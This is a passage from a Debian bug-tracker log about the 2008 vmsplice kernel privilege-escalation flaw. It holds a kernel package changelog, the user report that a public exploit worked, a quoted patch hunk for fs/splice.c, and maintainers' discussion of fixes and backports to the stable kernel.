     - lockdep: annotate epoll
     - forcedeth: mac address mcp77/79
     - USB: Fix usb_serial_driver structure for Kobil cardreader driver.
     - USB: handle idVendor of 0x0000
     - USB: fix usbtest halt check on big endian systems
     - USB: storage: Add unusual_dev for HP r707
     - USB: Variant of the Dell Wireless 5520 driver
     - USB: use GFP_NOIO in reset path
     - USB: ftdi driver - add support for optical probe device
     - USB: pl2303: add support for RATOC REX-USB60F
     - USB: remove duplicate entry in Option driver and Pl2303 driver for Huawei modem
     - USB: sierra: add support for Onda H600/Zte MF330 datacard to USB Driver for Sierra Wireless
     - USB: ftdi-sio: Patch to add vendor/device id for ATK_16IC CCD
     - USB: ftdi_sio - enabling multiple ELV devices, adding EM1010PC
     - USB: sierra driver - add devices
     - USB: Adding YC Cable USB Serial device to pl2303
     - USB: Sierra - Add support for Aircard 881U
     - USB: add support for 4348:5523 WinChipHead USB->RS 232 adapter
     - USB: CP2101 New Device IDs
     - usb gadget: fix fsl_usb2_udc potential OOPS
     - USB: keyspan: Fix oops
     - vm audit: add VM_DONTEXPAND to mmap for drivers that need it (CVE-2008-0007)
     - slab: fix bootstrap on memoryless node
     - DVB: cx23885: add missing subsystem ID for Hauppauge HVR1800 Retail
 .
   [ Martin Michlmayr ]
   * [arm/ixp4xx] Enble ATA_OVER_ETH, requested by Nicola Fankhauser.
   * [arm/iop32x] Enble ATA_OVER_ETH.
 .
   [ Bastian Blank ]
   * Add stable release 2.6.24.2:
     - splice: fix user pointer access in get_iovec_page_array()
     (CVE-2008-0600, closes: #464945)
Files: 
 971296a07704875d7715091e0bb75fa6 4297 devel optional linux-2.6_2.6.24-4.dsc
 5ca0c43e61b9280c6da7d5459b0b71e7 3631758 devel optional linux-2.6_2.6.24-4.diff.gz
 27722bc163f7f822db3421a390a31e3f 4276114 doc optional linux-doc-2.6.24_2.6.24-4_all.deb
 6b6a10398d37a67a27cc298617d7ba97 1551686 doc optional linux-manual-2.6.24_2.6.24-4_all.deb
 b2156c5a8008c08f3bfe2c4e1daccb55 579984 devel optional linux-patch-debian-2.6.24_2.6.24-4_all.deb
 8cfe0bce60323fe9cf616c251a9e9698 45935430 devel optional linux-source-2.6.24_2.6.24-4_all.deb
 b778e8daf4adcabb87825ee272476f61 89446 devel optional linux-support-2.6.24-1_2.6.24-4_all.deb
 8f7777e7926044546d99a2b0d53372f0 75042 devel optional linux-tree-2.6.24_2.6.24-4_all.deb
 37198b9515743c34e09a033f7e565829 19087100 admin optional linux-image-2.6.24-1-powerpc_2.6.24-4_powerpc.deb
 ed4e26cdd8a1a29aa4424d07bad29d5b 310040 devel optional linux-headers-2.6.24-1-powerpc_2.6.24-4_powerpc.deb
 8bbab6ec1551f35bb810097aa8d06b67 17348568 admin optional linux-image-2.6.24-1-powerpc-miboot_2.6.24-4_powerpc.deb
 a60112ce3490c810b0fcddb273e2cdcc 282226 devel optional linux-headers-2.6.24-1-powerpc-miboot_2.6.24-4_powerpc.deb
 b477b49c49a62f562e4742bd68b06fc0 19377568 admin optional linux-image-2.6.24-1-powerpc-smp_2.6.24-4_powerpc.deb
 2c59656e83fd96b2a92751be5b3ea76e 309208 devel optional linux-headers-2.6.24-1-powerpc-smp_2.6.24-4_powerpc.deb
 827ec84b09b0270e4f2f25c11b19e3e8 21017926 admin optional linux-image-2.6.24-1-powerpc64_2.6.24-4_powerpc.deb
 44b17a3fcc22864616ce26d650b75fbe 310680 devel optional linux-headers-2.6.24-1-powerpc64_2.6.24-4_powerpc.deb
 ca0d043d0c5a9744382e386d36b78589 3594522 devel optional linux-headers-2.6.24-1-common_2.6.24-4_powerpc.deb
 351478c946bee64fd5c9992d1345a7f2 74678 devel optional linux-headers-2.6.24-1-all_2.6.24-4_powerpc.deb
 8c83a9794df77eda176d12aae59c6ffa 74710 devel optional linux-headers-2.6.24-1-all-powerpc_2.6.24-4_powerpc.deb
 c21f01619e4dda2a66a5929ea0e7793d 714566 devel optional linux-libc-dev_2.6.24-4_powerpc.deb

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iEYEARECAAYFAkewRPgACgkQxWtQqFixGB7T3QCfUPviowvW0LyXZOCMEIznxc0e
OdkAn1Gp0QjWbTjcon3vv/mC893kblkP
=759s
-----END PGP SIGNATURE-----





Information forwarded to debian-bugs-dist@lists.debian.org, Debian Kernel Team <debian-kernel@lists.debian.org>:
Bug#464945; Package linux-2.6. Full text and rfc822 format available.

Acknowledgement sent to "Vitaliy Okulov" <vitaliy.okulov@gmail.com>:
Extra info received and forwarded to list. Copy sent to Debian Kernel Team <debian-kernel@lists.debian.org>. Full text and rfc822 format available.

Message #77 received at 464945@bugs.debian.org (full text, mbox):

From: "Vitaliy Okulov" <vitaliy.okulov@gmail.com>
To: 464945@bugs.debian.org
Subject: Re: Bug#464945 closed by Bastian Blank <waldi@debian.org> (Bug#464945: fixed in linux-2.6 2.6.24-4)
Date: Mon, 11 Feb 2008 17:00:58 +0300
[Message part 1 (text/plain, inline)]
When 2.6.18-6 kernel image will be updated?

2008/2/11, Debian Bug Tracking System <owner@bugs.debian.org>:
>
>
> Your message dated
> with message-id <E1JOYIZ-0007WE-O9@ries.debian.org>
> and subject line Bug#464945: fixed in linux-2.6 2.6.24-4
> has caused the Debian Bug report #464945,
> regarding linux-image-2.6.18-6-686: Exploit for vmsplice work for
> linux-image-2.18-5-686 (CVE-2008-0009/10)
> to be marked as done.
>
> This means that you claim that the problem has been dealt with.
> If this is not the case it is now your responsibility to reopen the
> Bug report if necessary, and/or fix the problem forthwith.
>
> (NB: If you are a system administrator and have no idea what this
> message is talking about, this may indicate a serious mail system
> misconfiguration somewhere. Please contact owner@bugs.debian.org
> immediately.)
>
>
> --
> 464945: http://bugs.debian.org/cgi-bin//464945
> Debian Bug Tracking System
> Contact owner@bugs.debian.org with problems
>
>
> ---------- Пересылаемое сообщение ----------
> From: Bastian Blank <waldi@debian.org>
> To: 464945-close@bugs.debian.org
> Date: Mon, 11 Feb 2008 13:02:15 +0000
> Subject: Bug#464945: fixed in linux-2.6 2.6.24-4
> Source: linux-2.6
> Source-Version: 2.6.24-4
>
> We believe that the bug you reported is fixed in the latest version of
> linux-2.6, which is due to be installed in the Debian FTP archive:
>
> linux-2.6_2.6.24-4.diff.gz
>   to pool/main/l/linux-2.6/linux-2.6_2.6.24-4.diff.gz
> linux-2.6_2.6.24-4.dsc
>   to pool/main/l/linux-2.6/linux-2.6_2.6.24-4.dsc
> linux-doc-2.6.24_2.6.24-4_all.deb
>   to pool/main/l/linux-2.6/linux-doc-2.6.24_2.6.24-4_all.deb
> linux-headers-2.6.24-1-all-powerpc_2.6.24-4_powerpc.deb
>   to pool/main/l/linux-2.6/linux-
> headers-2.6.24-1-all-powerpc_2.6.24-4_powerpc.deb
> linux-headers-2.6.24-1-all_2.6.24-4_powerpc.deb
>   to pool/main/l/linux-2.6/linux-headers-2.6.24-1-all_2.6.24-4_powerpc.deb
> linux-headers-2.6.24-1-common_2.6.24-4_powerpc.deb
>   to pool/main/l/linux-2.6/linux-
> headers-2.6.24-1-common_2.6.24-4_powerpc.deb
> linux-headers-2.6.24-1-powerpc-miboot_2.6.24-4_powerpc.deb
>   to pool/main/l/linux-2.6/linux-
> headers-2.6.24-1-powerpc-miboot_2.6.24-4_powerpc.deb
> linux-headers-2.6.24-1-powerpc-smp_2.6.24-4_powerpc.deb
>   to pool/main/l/linux-2.6/linux-
> headers-2.6.24-1-powerpc-smp_2.6.24-4_powerpc.deb
> linux-headers-2.6.24-1-powerpc64_2.6.24-4_powerpc.deb
>   to pool/main/l/linux-2.6/linux-
> headers-2.6.24-1-powerpc64_2.6.24-4_powerpc.deb
> linux-headers-2.6.24-1-powerpc_2.6.24-4_powerpc.deb
>   to pool/main/l/linux-2.6/linux-
> headers-2.6.24-1-powerpc_2.6.24-4_powerpc.deb
> linux-image-2.6.24-1-powerpc-miboot_2.6.24-4_powerpc.deb
>   to pool/main/l/linux-2.6/linux-
> image-2.6.24-1-powerpc-miboot_2.6.24-4_powerpc.deb
> linux-image-2.6.24-1-powerpc-smp_2.6.24-4_powerpc.deb
>   to pool/main/l/linux-2.6/linux-
> image-2.6.24-1-powerpc-smp_2.6.24-4_powerpc.deb
> linux-image-2.6.24-1-powerpc64_2.6.24-4_powerpc.deb
>   to pool/main/l/linux-2.6/linux-
> image-2.6.24-1-powerpc64_2.6.24-4_powerpc.deb
> linux-image-2.6.24-1-powerpc_2.6.24-4_powerpc.deb
>   to pool/main/l/linux-2.6/linux-
> image-2.6.24-1-powerpc_2.6.24-4_powerpc.deb
> linux-libc-dev_2.6.24-4_powerpc.deb
>   to pool/main/l/linux-2.6/linux-libc-dev_2.6.24-4_powerpc.deb
> linux-manual-2.6.24_2.6.24-4_all.deb
>   to pool/main/l/linux-2.6/linux-manual-2.6.24_2.6.24-4_all.deb
> linux-patch-debian-2.6.24_2.6.24-4_all.deb
>   to pool/main/l/linux-2.6/linux-patch-debian-2.6.24_2.6.24-4_all.deb
> linux-source-2.6.24_2.6.24-4_all.deb
>   to pool/main/l/linux-2.6/linux-source-2.6.24_2.6.24-4_all.deb
> linux-support-2.6.24-1_2.6.24-4_all.deb
>   to pool/main/l/linux-2.6/linux-support-2.6.24-1_2.6.24-4_all.deb
> linux-tree-2.6.24_2.6.24-4_all.deb
>   to pool/main/l/linux-2.6/linux-tree-2.6.24_2.6.24-4_all.deb
>
>
>
> A summary of the changes between this version and the previous one is
> attached.
>
> Thank you for reporting the bug, which will now be closed.  If you
> have further comments please address them to 464945@bugs.debian.org,
> and the maintainer will reopen the bug report if appropriate.
>
> Debian distribution maintenance software
> pp.
> Bastian Blank <waldi@debian.org> (supplier of updated linux-2.6 package)
>
> (This message was generated automatically at their request; if you
> believe that there is a problem with it please contact the archive
> administrators by mailing ftpmaster@debian.org)
>
>
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> Format: 1.7
> Date: Mon, 11 Feb 2008 12:29:23 +0100
> Source: linux-2.6
> Binary: linux-source-2.6.24 linux-doc-2.6.24 linux-manual-2.6.24
> linux-patch-debian-2.6.24 linux-tree-2.6.24 linux-support-2.6.24-1linux-libc-dev
> linux-headers-2.6.24-1-all linux-headers-2.6.24-1-all-alpha
> linux-headers-2.6.24-1-common linux-image-2.6.24-1-alpha-generic
> linux-headers-2.6.24-1-alpha-generic linux-image-2.6.24-1-alpha-smp
> linux-headers-2.6.24-1-alpha-smp linux-image-2.6.24-1-alpha-legacy
> linux-headers-2.6.24-1-alpha-legacy linux-headers-2.6.24-1-all-amd64
> linux-image-2.6.24-1-amd64 linux-headers-2.6.24-1-amd64
> linux-headers-2.6.24-1-all-arm linux-image-2.6.24-1-footbridge
> linux-headers-2.6.24-1-footbridge linux-image-2.6.24-1-iop32x
> linux-headers-2.6.24-1-iop32x linux-image-2.6.24-1-ixp4xx
> linux-headers-2.6.24-1-ixp4xx linux-headers-2.6.24-1-all-armel
> linux-image-2.6.24-1-versatile linux-headers-2.6.24-1-versatile
> linux-headers-2.6.24-1-all-hppa linux-image-2.6.24-1-parisc
> linux-headers-2.6.24-1-parisc linux-image-2.6.24-1-parisc-smp
> linux-headers-2.6.24-1-parisc-smp linux-image-2.6.24-1-parisc64
> linux-headers-2.6.24-1-parisc64 linux-image-2.6.24-1-parisc64-smp
> linux-headers-2.6.24-1-parisc64-smp linux-headers-2.6.24-1-all-i386
> linux-image-2.6.24-1-486 linux-headers-2.6.24-1-486
> linux-image-2.6.24-1-686 linux-headers-2.6.24-1-686
> linux-image-2.6.24-1-686-bigmem linux-headers-2.6.24-1-686-bigmem
> linux-headers-2.6.24-1-common-xen linux-image-2.6.24-1-xen-686
> linux-modules-2.6.24-1-xen-686 linux-headers-2.6.24-1-xen-686
> linux-headers-2.6.24-1-all-ia64 linux-image-2.6.24-1-itanium
> linux-headers-2.6.24-1-itanium linux-image-2.6.24-1-mckinley
> linux-headers-2.6.24-1-mckinley linux-headers-2.6.24-1-all-m68k
> linux-image-2.6.24-1-amiga linux-headers-2.6.24-1-amiga
> linux-image-2.6.24-1-atari linux-headers-2.6.24-1-atari
> linux-image-2.6.24-1-bvme6000 linux-headers-2.6.24-1-bvme6000
> linux-image-2.6.24-1-mac linux-headers-2.6.24-1-mac
> linux-image-2.6.24-1-mvme147 linux-headers-2.6.24-1-mvme147
> linux-image-2.6.24-1-mvme16x linux-headers-2.6.24-1-mvme16x
> linux-headers-2.6.24-1-all-mips linux-image-2.6.24-1-r4k-ip22
> linux-headers-2.6.24-1-r4k-ip22 linux-image-2.6.24-1-r5k-ip32
> linux-headers-2.6.24-1-r5k-ip32 linux-image-2.6.24-1-sb1-bcm91250a
> linux-headers-2.6.24-1-sb1-bcm91250a linux-image-2.6.24-1-sb1a-bcm91480b
> linux-headers-2.6.24-1-sb1a-bcm91480b linux-image-2.6.24-1-4kc-malta
> linux-headers-2.6.24-1-4kc-malta linux-image-2.6.24-1-5kc-malta
> linux-headers-2.6.24-1-5kc-malta linux-headers-2.6.24-1-all-mipsel
> linux-image-2.6.24-1-r5k-cobalt linux-headers-2.6.24-1-r5k-cobalt
> linux-headers-2.6.24-1-all-powerpc linux-image-2.6.24-1-powerpc
> linux-headers-2.6.24-1-powerpc linux-image-2.6.24-1-powerpc-smp
> linux-headers-2.6.24-1-powerpc-smp linux-image-2.6.24-1-powerpc-miboot
> linux-headers-2.6.24-1-powerpc-miboot linux-image-2.6.24-1-powerpc64
> linux-headers-2.6.24-1-powerpc64 linux-headers-2.6.24-1-all-s390
> linux-image-2.6.24-1-s390 linux-headers-2.6.24-1-s390
> linux-image-2.6.24-1-s390-tape linux-image-2.6.24-1-s390x
> linux-headers-2.6.24-1-s390x linux-headers-2.6.24-1-all-sparc
> linux-image-2.6.24-1-sparc64 linux-headers-2.6.24-1-sparc64
> linux-image-2.6.24-1-sparc64-smp linux-headers-2.6.24-1-sparc64-smp
> Architecture: source all powerpc
> Version: 2.6.24-4
> Distribution: unstable
> Urgency: low
> Maintainer: Debian Kernel Team <debian-kernel@lists.debian.org>
> Changed-By: Bastian Blank <waldi@debian.org>
> Description:
> linux-doc-2.6.24 - Linux kernel specific documentation for version 2.6.24
> linux-headers-2.6.24-1-all - All header files for Linux 2.6.24
> linux-headers-2.6.24-1-all-powerpc - All header files for Linux 2.6.24
> linux-headers-2.6.24-1-common - Common header files for Linux 2.6.24
> linux-headers-2.6.24-1-powerpc - Header files for Linux 2.6.24 on
> uniprocessor 32-bit PowerPC
> linux-headers-2.6.24-1-powerpc-miboot - Header files for Linux 2.6.24 on
> 32-bit PowerPC for miboot floppy
> linux-headers-2.6.24-1-powerpc-smp - Header files for Linux 2.6.24 on
> multiprocessor 32-bit PowerPC
> linux-headers-2.6.24-1-powerpc64 - Header files for Linux 2.6.24 on 64-bit
> PowerPC
> linux-image-2.6.24-1-powerpc - Linux 2.6.24 image on uniprocessor 32-bit
> PowerPC
> linux-image-2.6.24-1-powerpc-miboot - Linux 2.6.24 image on 32-bit PowerPC
> for miboot floppy
> linux-image-2.6.24-1-powerpc-smp - Linux 2.6.24 image on multiprocessor
> 32-bit PowerPC
> linux-image-2.6.24-1-powerpc64 - Linux 2.6.24 image on 64-bit PowerPC
> linux-libc-dev - Linux Kernel Headers for development
> linux-manual-2.6.24 - Linux kernel API manual pages for version 2.6.24
> linux-patch-debian-2.6.24 - Debian patches to version 2.6.24 of the Linux
> kernel
> linux-source-2.6.24 - Linux kernel source for version 2.6.24 with Debian
> patches
> linux-support-2.6.24-1 - Support files for Linux 2.6.24
> linux-tree-2.6.24 - Linux kernel source tree for building Debian kernel
> images
> Closes: 464945
> Changes:
> linux-2.6 (2.6.24-4) unstable; urgency=low
> .
>    * Add stable release 2.6.24.1:
>      - splice: missing user pointer access verification (CVE-2008-0009/10)
>      - drm: the drm really should call pci_set_master..
>      - Driver core: Revert "Fix Firmware class name collision"
>      - fix writev regression: pan hanging unkillable and un-straceable
>      - sched: fix high wake up latencies with FAIR_USER_SCHED
>      - sched: let +nice tasks have smaller impact
>      - b43: Reject new firmware early
>      - selinux: fix labeling of /proc/net inodes
>      - b43legacy: fix DMA slot resource leakage
>      - b43legacy: drop packets we are not able to encrypt
>      - b43legacy: fix suspend/resume
>      - b43legacy: fix PIO crash
>      - b43: Fix dma-slot resource leakage
>      - b43: Drop packets we are not able to encrypt
>      - b43: Fix suspend/resume
>      - sky2: fix for WOL on some devices
>      - sky2: restore multicast addresses after recovery
>      - x86: restore correct module name for apm
>      - ACPI: update ACPI blacklist
>      - PCI: Fix fakephp deadlock
>      - sys_remap_file_pages: fix ->vm_file accounting
>      - lockdep: annotate epoll
>      - forcedeth: mac address mcp77/79
>      - USB: Fix usb_serial_driver structure for Kobil cardreader driver.
>      - USB: handle idVendor of 0x0000
>      - USB: fix usbtest halt check on big endian systems
>      - USB: storage: Add unusual_dev for HP r707
>      - USB: Variant of the Dell Wireless 5520 driver
>      - USB: use GFP_NOIO in reset path
>      - USB: ftdi driver - add support for optical probe device
>      - USB: pl2303: add support for RATOC REX-USB60F
>      - USB: remove duplicate entry in Option driver and Pl2303 driver for
> Huawei modem
>      - USB: sierra: add support for Onda H600/Zte MF330 datacard to USB
> Driver for Sierra Wireless
>      - USB: ftdi-sio: Patch to add vendor/device id for ATK_16IC CCD
>      - USB: ftdi_sio - enabling multiple ELV devices, adding EM1010PC
>      - USB: sierra driver - add devices
>      - USB: Adding YC Cable USB Serial device to pl2303
>      - USB: Sierra - Add support for Aircard 881U
>      - USB: add support for 4348:5523 WinChipHead USB->RS 232 adapter
>      - USB: CP2101 New Device IDs
>      - usb gadget: fix fsl_usb2_udc potential OOPS
>      - USB: keyspan: Fix oops
>      - vm audit: add VM_DONTEXPAND to mmap for drivers that need it
> (CVE-2008-0007)
>      - slab: fix bootstrap on memoryless node
>      - DVB: cx23885: add missing subsystem ID for Hauppauge HVR1800 Retail
> .
>    [ Martin Michlmayr ]
>    * [arm/ixp4xx] Enble ATA_OVER_ETH, requested by Nicola Fankhauser.
>    * [arm/iop32x] Enble ATA_OVER_ETH.
> .
>    [ Bastian Blank ]
>    * Add stable release 2.6.24.2:
>      - splice: fix user pointer access in get_iovec_page_array()
>      (CVE-2008-0600, closes: #464945)
> Files:
> 971296a07704875d7715091e0bb75fa6 4297 devel optional
> linux-2.6_2.6.24-4.dsc
> 5ca0c43e61b9280c6da7d5459b0b71e7 3631758 devel optional
> linux-2.6_2.6.24-4.diff.gz
> 27722bc163f7f822db3421a390a31e3f 4276114 doc optional
> linux-doc-2.6.24_2.6.24-4_all.deb
> 6b6a10398d37a67a27cc298617d7ba97 1551686 doc optional
> linux-manual-2.6.24_2.6.24-4_all.deb
> b2156c5a8008c08f3bfe2c4e1daccb55 579984 devel optional
> linux-patch-debian-2.6.24_2.6.24-4_all.deb
> 8cfe0bce60323fe9cf616c251a9e9698 45935430 devel optional
> linux-source-2.6.24_2.6.24-4_all.deb
> b778e8daf4adcabb87825ee272476f61 89446 devel optional
> linux-support-2.6.24-1_2.6.24-4_all.deb
> 8f7777e7926044546d99a2b0d53372f0 75042 devel optional
> linux-tree-2.6.24_2.6.24-4_all.deb
> 37198b9515743c34e09a033f7e565829 19087100 admin optional
> linux-image-2.6.24-1-powerpc_2.6.24-4_powerpc.deb
> ed4e26cdd8a1a29aa4424d07bad29d5b 310040 devel optional
> linux-headers-2.6.24-1-powerpc_2.6.24-4_powerpc.deb
> 8bbab6ec1551f35bb810097aa8d06b67 17348568 admin optional
> linux-image-2.6.24-1-powerpc-miboot_2.6.24-4_powerpc.deb
> a60112ce3490c810b0fcddb273e2cdcc 282226 devel optional
> linux-headers-2.6.24-1-powerpc-miboot_2.6.24-4_powerpc.deb
> b477b49c49a62f562e4742bd68b06fc0 19377568 admin optional
> linux-image-2.6.24-1-powerpc-smp_2.6.24-4_powerpc.deb
> 2c59656e83fd96b2a92751be5b3ea76e 309208 devel optional
> linux-headers-2.6.24-1-powerpc-smp_2.6.24-4_powerpc.deb
> 827ec84b09b0270e4f2f25c11b19e3e8 21017926 admin optional
> linux-image-2.6.24-1-powerpc64_2.6.24-4_powerpc.deb
> 44b17a3fcc22864616ce26d650b75fbe 310680 devel optional
> linux-headers-2.6.24-1-powerpc64_2.6.24-4_powerpc.deb
> ca0d043d0c5a9744382e386d36b78589 3594522 devel optional
> linux-headers-2.6.24-1-common_2.6.24-4_powerpc.deb
> 351478c946bee64fd5c9992d1345a7f2 74678 devel optional
> linux-headers-2.6.24-1-all_2.6.24-4_powerpc.deb
> 8c83a9794df77eda176d12aae59c6ffa 74710 devel optional
> linux-headers-2.6.24-1-all-powerpc_2.6.24-4_powerpc.deb
> c21f01619e4dda2a66a5929ea0e7793d 714566 devel optional
> linux-libc-dev_2.6.24-4_powerpc.deb
>
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.4.6 (GNU/Linux)
>
> iEYEARECAAYFAkewRPgACgkQxWtQqFixGB7T3QCfUPviowvW0LyXZOCMEIznxc0e
> OdkAn1Gp0QjWbTjcon3vv/mC893kblkP
> =759s
> -----END PGP SIGNATURE-----
>
>
>
>
> ---------- Пересылаемое сообщение ----------
> From: Okulov Vitaliy <vitaliy.okulov@gmail.com>
> To: Debian Bug Tracking System <submit@bugs.debian.org>
> Date: Sun, 10 Feb 2008 03:19:20 +0300
> Subject: linux-image-2.6.18-6-686: Exploit for vmsplice work for
> linux-image-2.18-5-686 (CVE-2008-0009/10)
> Package: linux-image-2.6.18-6-686
> Version: 2.6.18.dfsg.1-17etch1
> Severity: critical
> Tags: security
> Justification: root security hole
>
>
> Just try explot from http://www.milw0rm.com/exploits/5092 at my
> linux-image-2.6.18-5-686 kernel. And it works. Please backport patch
> from 2.6.24.1 kernel (CVE-2008-0009/10).
>
> -- System Information:
> Debian Release: 4.0
>   APT prefers stable
>   APT policy: (500, 'stable')
> Architecture: i386 (i686)
> Shell:  /bin/sh linked to /bin/bash
> Kernel: Linux 2.6.18-5-686
> Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
>
> Versions of packages linux-image-2.6.18-6-686 depends on:
> ii  coreutils                    5.97-5.3    The GNU core utilities
> ii  debconf [debconf-2.0]        1.5.11etch1 Debian configuration
> management sy
> ii  initramfs-tools [linux-initr 0.85h       tools for generating an
> initramfs
> ii  module-init-tools            3.3-pre4-2  tools for managing Linux
> kernel mo
>
> Versions of packages linux-image-2.6.18-6-686 recommends:
> ii  libc6-i686             2.3.6.ds1-13etch4 GNU C Library: Shared
> libraries [i
>
> -- debconf information:
>   shared/kernel-image/really-run-bootloader: true
>   linux-image-2.6.18-6-686/preinst/elilo-initrd-2.6.18-6-686: true
>   linux-image-2.6.18-6-686/preinst/already-running-this-2.6.18-6-686:
>   linux-image-2.6.18-6-686/postinst/depmod-error-2.6.18-6-686: false
>   linux-image-2.6.18-6-686/preinst/initrd-2.6.18-6-686:
>   linux-image-2.6.18-6-686/postinst/old-initrd-link-2.6.18-6-686: true
>   linux-image-2.6.18-6-686/preinst/bootloader-initrd-2.6.18-6-686: true
>   linux-image-2.6.18-6-686/preinst/abort-install-2.6.18-6-686:
>   linux-image-2.6.18-6-686/preinst/lilo-has-ramdisk:
>   linux-image-2.6.18-6-686/preinst/overwriting-modules-2.6.18-6-686: true
>   linux-image-2.6.18-6-686/postinst/bootloader-error-2.6.18-6-686:
>   linux-image-2.6.18-6-686/prerm/would-invalidate-boot-loader-2.6.18-6-686:
> true
>   linux-image-2.6.18-6-686/postinst/bootloader-test-error-2.6.18-6-686:
>   linux-image-2.6.18-6-686/postinst/create-kimage-link-2.6.18-6-686: true
>   linux-image-2.6.18-6-686/postinst/depmod-error-initrd-2.6.18-6-686:
> false
>   linux-image-2.6.18-6-686/preinst/lilo-initrd-2.6.18-6-686: true
>   linux-image-2.6.18-6-686/postinst/old-dir-initrd-link-2.6.18-6-686: true
>   linux-image-2.6.18-6-686/preinst/failed-to-move-modules-2.6.18-6-686:
>   linux-image-2.6.18-6-686/preinst/abort-overwrite-2.6.18-6-686:
>   linux-image-2.6.18-6-686/prerm/removing-running-kernel-2.6.18-6-686:
> true
>   linux-image-2.6.18-6-686/postinst/old-system-map-link-2.6.18-6-686: true
>   linux-image-2.6.18-6-686/postinst/kimage-is-a-directory:
>
>
>
>
[Message part 2 (text/html, inline)]

Information forwarded to debian-bugs-dist@lists.debian.org, Debian Kernel Team <debian-kernel@lists.debian.org>:
Bug#464945; Package linux-2.6. Full text and rfc822 format available.

Acknowledgement sent to Florian Weimer <fw@deneb.enyo.de>:
Extra info received and forwarded to list. Copy sent to Debian Kernel Team <debian-kernel@lists.debian.org>. Full text and rfc822 format available.

Message #82 received at 464945@bugs.debian.org (full text, mbox):

From: Florian Weimer <fw@deneb.enyo.de>
To: Bastian Blank <waldi@debian.org>
Cc: 464945@bugs.debian.org, Okulov Vitaliy <vitaliy.okulov@gmail.com>
Subject: Re: Bug#464945: linux-image-2.6.18-6-686: Exploit for vmsplice work for linux-image-2.18-5-686 (CVE-2008-0009/10)
Date: Tue, 12 Feb 2008 19:01:58 +0100
* Bastian Blank:

> diff --git a/fs/splice.c b/fs/splice.c
> index 684bca3..2d7e598 100644
> --- a/fs/splice.c
> +++ b/fs/splice.c
> @@ -1122,6 +1122,11 @@ static int get_iovec_page_array(const struct iovec __user *iov,
>  		size_t len;
>  		int i;
>  
> +		if (!access_ok(VERIFY_READ, iov, sizeof(struct iovec))) {
> +			error = -EFAULT;
> +			break;
> +		}
> +
>  		/*
>  		 * Get user address base and length for this iovec.
>  		 */

For the record, the above hunk is unnecessary because the get_user()
calls which immediately follow the quoted code perform implict
access_ok() checks.  CVE-2008-0010 does NOT apply to our 2.6.18 kernel
(but the additional access_ok() call doesn't cause any harm, either).

I'm writing this because some vendors have released pre-2.6.23 patches
without this hunk, and I don't want to create impression they are still
vulnerable.




Information forwarded to debian-bugs-dist@lists.debian.org, Debian Kernel Team <debian-kernel@lists.debian.org>:
Bug#464945; Package linux-2.6. Full text and rfc822 format available.

Acknowledgement sent to Bastian Blank <waldi@debian.org>:
Extra info received and forwarded to list. Copy sent to Debian Kernel Team <debian-kernel@lists.debian.org>. Full text and rfc822 format available.

Message #87 received at 464945@bugs.debian.org (full text, mbox):

From: Bastian Blank <waldi@debian.org>
To: Florian Weimer <fw@deneb.enyo.de>
Cc: 464945@bugs.debian.org, Okulov Vitaliy <vitaliy.okulov@gmail.com>
Subject: Re: Bug#464945: linux-image-2.6.18-6-686: Exploit for vmsplice work for linux-image-2.18-5-686 (CVE-2008-0009/10)
Date: Tue, 12 Feb 2008 19:26:39 +0100
On Tue, Feb 12, 2008 at 07:01:58PM +0100, Florian Weimer wrote:
> For the record, the above hunk is unnecessary because the get_user()
> calls which immediately follow the quoted code perform implict
> access_ok() checks.  CVE-2008-0010 does NOT apply to our 2.6.18 kernel
> (but the additional access_ok() call doesn't cause any harm, either).

Looks like I missread a comment. I rechecked it and it does the check.

Bastian

-- 
No problem is insoluble.
		-- Dr. Janet Wallace, "The Deadly Years", stardate 3479.4




Reply sent to Bastian Blank <waldi@debian.org>:
You have taken responsibility. Full text and rfc822 format available.

Notification sent to Okulov Vitaliy <vitaliy.okulov@gmail.com>:
Bug acknowledged by developer. Full text and rfc822 format available.

Reply sent to Bastian Blank <waldi@debian.org>:
You have taken responsibility. Full text and rfc822 format available.

Notification sent to William Pitcock <nenolod@sacredspiral.co.uk>:
Bug acknowledged by developer. Full text and rfc822 format available.

Reply sent to Bastian Blank <waldi@debian.org>:
You have taken responsibility. Full text and rfc822 format available.

Notification sent to "Martin Guy" <martinwguy@yahoo.it>:
Bug acknowledged by developer. Full text and rfc822 format available.

Information forwarded to debian-bugs-dist@lists.debian.org, Debian Kernel Team <debian-kernel@lists.debian.org>:
Bug#464945; Package linux-2.6. Full text and rfc822 format available.

Acknowledgement sent to Amir Tabatabaei <amir@microsist.com>:
Extra info received and forwarded to list. Copy sent to Debian Kernel Team <debian-kernel@lists.debian.org>. Full text and rfc822 format available.

Message #107 received at 464945@bugs.debian.org (full text, mbox):

From: Amir Tabatabaei <amir@microsist.com>
To: 464945@bugs.debian.org, waldi@debian.org
Subject: Re: Bug#464945 closed by Bastian Blank <waldi@debian.org> (Bug#464945: fixed in linux-2.6 2.6.24-4)
Date: Tue, 12 Feb 2008 21:28:29 +0100
Hi Bastian,

On Mon, 2008-02-11 at 17:00 +0300, Vitaliy Okulov wrote:
> When 2.6.18-6 kernel image will be updated?

when will you patch 2.6.18 in stable as this is much more important than
the one in unstable? (although my own desktop is secure for the
moment :-) )

Regards,
Amir





Bug marked as fixed in version 2.6.18.dfsg.1-18etch1. Request was from Stefan Fritsch <sf@debian.org> to control@bugs.debian.org. (Fri, 22 Feb 2008 19:06:09 GMT) Full text and rfc822 format available.

Bug marked as fixed in version 2.6.22-6.lenny1. Request was from Stefan Fritsch <sf@debian.org> to control@bugs.debian.org. (Fri, 22 Feb 2008 19:06:12 GMT) Full text and rfc822 format available.

Bug marked as found in version 2.6.17-1. Request was from Stefan Fritsch <sf@debian.org> to control@bugs.debian.org. (Fri, 22 Feb 2008 19:06:15 GMT) Full text and rfc822 format available.

Bug archived. Request was from Debbugs Internal Request <owner@bugs.debian.org> to internal_control@bugs.debian.org. (Fri, 28 Mar 2008 07:39:02 GMT) Full text and rfc822 format available.

Send a report that this bug log contains spam.


Debian bug tracking system administrator <owner@bugs.debian.org>. Last modified: Wed Apr 16 04:56:12 2014; Machine Name: beach.debian.org

Debian Bug tracking system
Copyright (C) 1999 Darren O. Benham, 1997,2003 nCipher Corporation Ltd, 1994-97 Ian Jackson.